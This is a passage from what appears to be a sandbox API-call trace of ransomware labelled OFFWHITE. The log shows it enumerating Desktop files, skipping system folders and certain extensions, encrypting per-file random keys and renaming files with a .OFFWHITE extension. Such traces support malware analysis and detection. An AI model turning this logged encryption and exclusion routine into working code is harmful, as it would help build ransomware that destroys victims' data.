HALPmcxz\\Desktop\\jy2fj9OToxS.mkv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jy2fj9OToxS.mkv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jy2fj9OToxS.mkv" [0132.245] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jy2fj9OToxS.mkv", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jy2fj9OToxS.mkv.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jy2fj9OToxS.mkv.OFFWHITE" [0132.246] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jy2fj9OToxS.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jy2fj9otoxs.mkv"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jy2fj9OToxS.mkv.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jy2fj9otoxs.mkv.offwhite")) returned 1 [0132.247] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc58f870, ftCreationTime.dwHighDateTime=0x1d5e458, ftLastAccessTime.dwLowDateTime=0x8c465420, ftLastAccessTime.dwHighDateTime=0x1d5e209, ftLastWriteTime.dwLowDateTime=0x8c465420, ftLastWriteTime.dwHighDateTime=0x1d5e209, nFileSizeHigh=0x0, nFileSizeLow=0x15a47, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="NBlizqwzvzOCnk.xlsx", cAlternateFileName="NBLIZQ~1.XLS")) returned 1 [0132.247] lstrcmpiW (lpString1="NBlizqwzvzOCnk.xlsx", lpString2=".") returned 1 [0132.247] lstrcmpiW (lpString1="NBlizqwzvzOCnk.xlsx", lpString2="..") returned 1 [0132.247] lstrcmpiW (lpString1="NBlizqwzvzOCnk.xlsx", lpString2="...") returned 1 [0132.248] lstrcmpiW (lpString1="NBlizqwzvzOCnk.xlsx", lpString2="windows") returned -1 [0132.248] lstrcmpiW (lpString1="NBlizqwzvzOCnk.xlsx", lpString2="$recycle.bin") returned 1 [0132.248] lstrcmpiW (lpString1="NBlizqwzvzOCnk.xlsx", lpString2="rsa") returned -1 [0132.248] lstrcmpiW (lpString1="NBlizqwzvzOCnk.xlsx", lpString2="ntuser.dat") returned -1 [0132.248] lstrcmpiW (lpString1="NBlizqwzvzOCnk.xlsx", lpString2="programdata") returned -1 [0132.248] lstrcmpiW (lpString1="NBlizqwzvzOCnk.xlsx", lpString2="appdata") returned 1 [0132.248] lstrcmpiW (lpString1="NBlizqwzvzOCnk.xlsx", lpString2="program files") returned -1 [0132.248] lstrcmpiW (lpString1="NBlizqwzvzOCnk.xlsx", lpString2="program files (x86)") returned -1 [0132.248] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0132.248] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="NBlizqwzvzOCnk.xlsx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NBlizqwzvzOCnk.xlsx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NBlizqwzvzOCnk.xlsx" [0132.248] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.248] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.248] PathFindExtensionW (pszPath="NBlizqwzvzOCnk.xlsx") returned=".xlsx" [0132.248] lstrcmpiW (lpString1=".xlsx", lpString2=".exe") returned 1 [0132.248] lstrcmpiW (lpString1=".xlsx", lpString2=".log") returned 1 [0132.248] lstrcmpiW (lpString1=".xlsx", lpString2=".cab") returned 1 [0132.248] lstrcmpiW (lpString1=".xlsx", lpString2=".cmd") returned 1 [0132.248] lstrcmpiW (lpString1=".xlsx", lpString2=".com") returned 1 [0132.248] lstrcmpiW (lpString1=".xlsx", lpString2=".cpl") returned 1 [0132.248] lstrcmpiW (lpString1=".xlsx", lpString2=".ini") returned 1 [0132.248] lstrcmpiW (lpString1=".xlsx", lpString2=".dll") returned 1 [0132.248] lstrcmpiW (lpString1=".xlsx", lpString2=".url") returned 1 [0132.248] lstrcmpiW (lpString1=".xlsx", lpString2=".ttf") returned 1 [0132.249] lstrcmpiW (lpString1=".xlsx", lpString2=".mp3") returned 1 [0132.249] lstrcmpiW (lpString1=".xlsx", lpString2=".pif") returned 1 [0132.249] lstrcmpiW (lpString1=".xlsx", lpString2=".mp4") returned 1 [0132.249] lstrcmpiW (lpString1=".xlsx", lpString2=".OFFWHITE") returned 1 [0132.249] lstrcmpiW (lpString1=".xlsx", lpString2=".msi") returned 1 [0132.249] lstrcmpiW (lpString1="NBlizqwzvzOCnk.xlsx", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0132.249] GetProcessHeap () returned 0x500000 [0132.249] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547f58 [0132.249] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NBlizqwzvzOCnk.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nblizqwzvzocnk.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0132.249] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=88647) returned 1 [0132.250] GetProcessHeap () returned 0x500000 [0132.250] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0132.250] GetProcessHeap () returned 0x500000 [0132.250] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.250] GetProcessHeap () returned 0x500000 [0132.250] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.250] GetProcessHeap () returned 0x500000 [0132.250] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.250] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.250] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.250] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.250] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.250] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.250] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.250] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.250] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.250] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e310*=0x100) returned 1 [0132.250] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.251] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.251] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0132.251] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x15a47, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.251] SetLastError (dwErrCode=0x0) [0132.251] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.253] GetLastError () returned 0x0 [0132.253] GetLastError () returned 0x0 [0132.253] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x15b47, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.253] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.253] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x15c47, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.253] WriteFile (in: hFile=0xb0, lpBuffer=0x547f58*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547f58*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0132.253] GetProcessHeap () returned 0x500000 [0132.253] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x15a47) returned 0x5577b0 [0132.253] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.253] ReadFile (in: hFile=0xb0, lpBuffer=0x5577b0, nNumberOfBytesToRead=0x15a47, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5577b0*, lpNumberOfBytesRead=0x295e540*=0x15a47, lpOverlapped=0x0) returned 1 [0132.260] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.260] WriteFile (in: hFile=0xb0, lpBuffer=0x5577b0*, nNumberOfBytesToWrite=0x15a47, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5577b0*, lpNumberOfBytesWritten=0x295e54c*=0x15a47, lpOverlapped=0x0) returned 1 [0132.261] GetProcessHeap () returned 0x500000 [0132.261] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5577b0 | out: hHeap=0x500000) returned 1 [0132.261] CloseHandle (hObject=0xb0) returned 1 [0132.271] GetProcessHeap () returned 0x500000 [0132.271] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.271] GetProcessHeap () returned 0x500000 [0132.271] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.271] GetProcessHeap () returned 0x500000 [0132.271] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.271] GetProcessHeap () returned 0x500000 [0132.271] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.271] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NBlizqwzvzOCnk.xlsx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NBlizqwzvzOCnk.xlsx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NBlizqwzvzOCnk.xlsx" [0132.271] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NBlizqwzvzOCnk.xlsx", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NBlizqwzvzOCnk.xlsx.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NBlizqwzvzOCnk.xlsx.OFFWHITE" [0132.271] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NBlizqwzvzOCnk.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nblizqwzvzocnk.xlsx"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NBlizqwzvzOCnk.xlsx.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nblizqwzvzocnk.xlsx.offwhite")) returned 1 [0132.273] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x600718a0, ftCreationTime.dwHighDateTime=0x1d5e334, ftLastAccessTime.dwLowDateTime=0x79160870, ftLastAccessTime.dwHighDateTime=0x1d5e798, ftLastWriteTime.dwLowDateTime=0x79160870, ftLastWriteTime.dwHighDateTime=0x1d5e798, nFileSizeHigh=0x0, nFileSizeLow=0x12b1d, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="NNjRk9HesHLZ0x.m4a", cAlternateFileName="NNJRK9~1.M4A")) returned 1 [0132.273] lstrcmpiW (lpString1="NNjRk9HesHLZ0x.m4a", lpString2=".") returned 1 [0132.273] lstrcmpiW (lpString1="NNjRk9HesHLZ0x.m4a", lpString2="..") returned 1 [0132.273] lstrcmpiW (lpString1="NNjRk9HesHLZ0x.m4a", lpString2="...") returned 1 [0132.273] lstrcmpiW (lpString1="NNjRk9HesHLZ0x.m4a", lpString2="windows") returned -1 [0132.273] lstrcmpiW (lpString1="NNjRk9HesHLZ0x.m4a", lpString2="$recycle.bin") returned 1 [0132.273] lstrcmpiW (lpString1="NNjRk9HesHLZ0x.m4a", lpString2="rsa") returned -1 [0132.273] lstrcmpiW (lpString1="NNjRk9HesHLZ0x.m4a", lpString2="ntuser.dat") returned -1 [0132.273] lstrcmpiW (lpString1="NNjRk9HesHLZ0x.m4a", lpString2="programdata") returned -1 [0132.273] lstrcmpiW (lpString1="NNjRk9HesHLZ0x.m4a", lpString2="appdata") returned 1 [0132.273] lstrcmpiW (lpString1="NNjRk9HesHLZ0x.m4a", lpString2="program files") returned -1 [0132.273] lstrcmpiW (lpString1="NNjRk9HesHLZ0x.m4a", lpString2="program files (x86)") returned -1 [0132.273] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0132.274] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="NNjRk9HesHLZ0x.m4a" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NNjRk9HesHLZ0x.m4a") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NNjRk9HesHLZ0x.m4a" [0132.274] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.274] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.274] PathFindExtensionW (pszPath="NNjRk9HesHLZ0x.m4a") returned=".m4a" [0132.274] lstrcmpiW (lpString1=".m4a", lpString2=".exe") returned 1 [0132.274] lstrcmpiW (lpString1=".m4a", lpString2=".log") returned 1 [0132.274] lstrcmpiW (lpString1=".m4a", lpString2=".cab") returned 1 [0132.274] lstrcmpiW (lpString1=".m4a", lpString2=".cmd") returned 1 [0132.274] lstrcmpiW (lpString1=".m4a", lpString2=".com") returned 1 [0132.274] lstrcmpiW (lpString1=".m4a", lpString2=".cpl") returned 1 [0132.274] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0132.274] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0132.274] lstrcmpiW (lpString1=".m4a", lpString2=".url") returned -1 [0132.274] lstrcmpiW (lpString1=".m4a", lpString2=".ttf") returned -1 [0132.274] lstrcmpiW (lpString1=".m4a", lpString2=".mp3") returned -1 [0132.274] lstrcmpiW (lpString1=".m4a", lpString2=".pif") returned -1 [0132.274] lstrcmpiW (lpString1=".m4a", lpString2=".mp4") returned -1 [0132.274] lstrcmpiW (lpString1=".m4a", lpString2=".OFFWHITE") returned -1 [0132.275] lstrcmpiW (lpString1=".m4a", lpString2=".msi") returned -1 [0132.275] lstrcmpiW (lpString1="NNjRk9HesHLZ0x.m4a", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0132.275] GetProcessHeap () returned 0x500000 [0132.275] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547f68 [0132.275] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NNjRk9HesHLZ0x.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nnjrk9heshlz0x.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0132.275] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=76573) returned 1 [0132.275] GetProcessHeap () returned 0x500000 [0132.275] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.275] GetProcessHeap () returned 0x500000 [0132.275] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0132.276] GetProcessHeap () returned 0x500000 [0132.276] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.276] GetProcessHeap () returned 0x500000 [0132.276] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.276] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.276] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.276] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.276] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.276] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.276] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.276] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.276] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.276] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e310*=0x100) returned 1 [0132.276] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.276] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.276] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0132.277] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x12b1d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.277] SetLastError (dwErrCode=0x0) [0132.277] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.281] GetLastError () returned 0x0 [0132.281] GetLastError () returned 0x0 [0132.281] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x12c1d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.281] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.281] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x12d1d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.281] WriteFile (in: hFile=0xb0, lpBuffer=0x547f68*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547f68*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0132.281] GetProcessHeap () returned 0x500000 [0132.281] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x12b1d) returned 0x5577b0 [0132.281] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.281] ReadFile (in: hFile=0xb0, lpBuffer=0x5577b0, nNumberOfBytesToRead=0x12b1d, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5577b0*, lpNumberOfBytesRead=0x295e540*=0x12b1d, lpOverlapped=0x0) returned 1 [0132.287] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.287] WriteFile (in: hFile=0xb0, lpBuffer=0x5577b0*, nNumberOfBytesToWrite=0x12b1d, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5577b0*, lpNumberOfBytesWritten=0x295e54c*=0x12b1d, lpOverlapped=0x0) returned 1 [0132.287] GetProcessHeap () returned 0x500000 [0132.287] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5577b0 | out: hHeap=0x500000) returned 1 [0132.287] CloseHandle (hObject=0xb0) returned 1 [0132.292] GetProcessHeap () returned 0x500000 [0132.292] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.292] GetProcessHeap () returned 0x500000 [0132.292] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.292] GetProcessHeap () returned 0x500000 [0132.292] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.292] GetProcessHeap () returned 0x500000 [0132.293] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.293] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NNjRk9HesHLZ0x.m4a" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NNjRk9HesHLZ0x.m4a") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NNjRk9HesHLZ0x.m4a" [0132.293] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NNjRk9HesHLZ0x.m4a", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NNjRk9HesHLZ0x.m4a.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NNjRk9HesHLZ0x.m4a.OFFWHITE" [0132.293] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NNjRk9HesHLZ0x.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nnjrk9heshlz0x.m4a"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NNjRk9HesHLZ0x.m4a.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nnjrk9heshlz0x.m4a.offwhite")) returned 1 [0132.294] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x425eda20, ftCreationTime.dwHighDateTime=0x1d5dc29, ftLastAccessTime.dwLowDateTime=0xab906a00, ftLastAccessTime.dwHighDateTime=0x1d5e7db, ftLastWriteTime.dwLowDateTime=0xab906a00, ftLastWriteTime.dwHighDateTime=0x1d5e7db, nFileSizeHigh=0x0, nFileSizeLow=0x9231, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="OdweMCCYu.jpg", cAlternateFileName="ODWEMC~1.JPG")) returned 1 [0132.294] lstrcmpiW (lpString1="OdweMCCYu.jpg", lpString2=".") returned 1 [0132.294] lstrcmpiW (lpString1="OdweMCCYu.jpg", lpString2="..") returned 1 [0132.294] lstrcmpiW (lpString1="OdweMCCYu.jpg", lpString2="...") returned 1 [0132.294] lstrcmpiW (lpString1="OdweMCCYu.jpg", lpString2="windows") returned -1 [0132.294] lstrcmpiW (lpString1="OdweMCCYu.jpg", lpString2="$recycle.bin") returned 1 [0132.294] lstrcmpiW (lpString1="OdweMCCYu.jpg", lpString2="rsa") returned -1 [0132.295] lstrcmpiW (lpString1="OdweMCCYu.jpg", lpString2="ntuser.dat") returned 1 [0132.295] lstrcmpiW (lpString1="OdweMCCYu.jpg", lpString2="programdata") returned -1 [0132.295] lstrcmpiW (lpString1="OdweMCCYu.jpg", lpString2="appdata") returned 1 [0132.295] lstrcmpiW (lpString1="OdweMCCYu.jpg", lpString2="program files") returned -1 [0132.295] lstrcmpiW (lpString1="OdweMCCYu.jpg", lpString2="program files (x86)") returned -1 [0132.295] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0132.295] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="OdweMCCYu.jpg" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OdweMCCYu.jpg") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OdweMCCYu.jpg" [0132.295] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.295] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.295] PathFindExtensionW (pszPath="OdweMCCYu.jpg") returned=".jpg" [0132.295] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0132.295] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0132.295] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0132.295] lstrcmpiW (lpString1=".jpg", lpString2=".cmd") returned 1 [0132.295] lstrcmpiW (lpString1=".jpg", lpString2=".com") returned 1 [0132.295] lstrcmpiW (lpString1=".jpg", lpString2=".cpl") returned 1 [0132.295] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0132.295] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0132.296] lstrcmpiW (lpString1=".jpg", lpString2=".url") returned -1 [0132.296] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0132.296] lstrcmpiW (lpString1=".jpg", lpString2=".mp3") returned -1 [0132.296] lstrcmpiW (lpString1=".jpg", lpString2=".pif") returned -1 [0132.296] lstrcmpiW (lpString1=".jpg", lpString2=".mp4") returned -1 [0132.296] lstrcmpiW (lpString1=".jpg", lpString2=".OFFWHITE") returned -1 [0132.296] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0132.296] lstrcmpiW (lpString1="OdweMCCYu.jpg", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0132.296] GetProcessHeap () returned 0x500000 [0132.296] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547f78 [0132.296] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OdweMCCYu.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\odwemccyu.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0132.297] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=37425) returned 1 [0132.297] GetProcessHeap () returned 0x500000 [0132.297] RtlAllocateHeap (HeapHandle=0x500000, 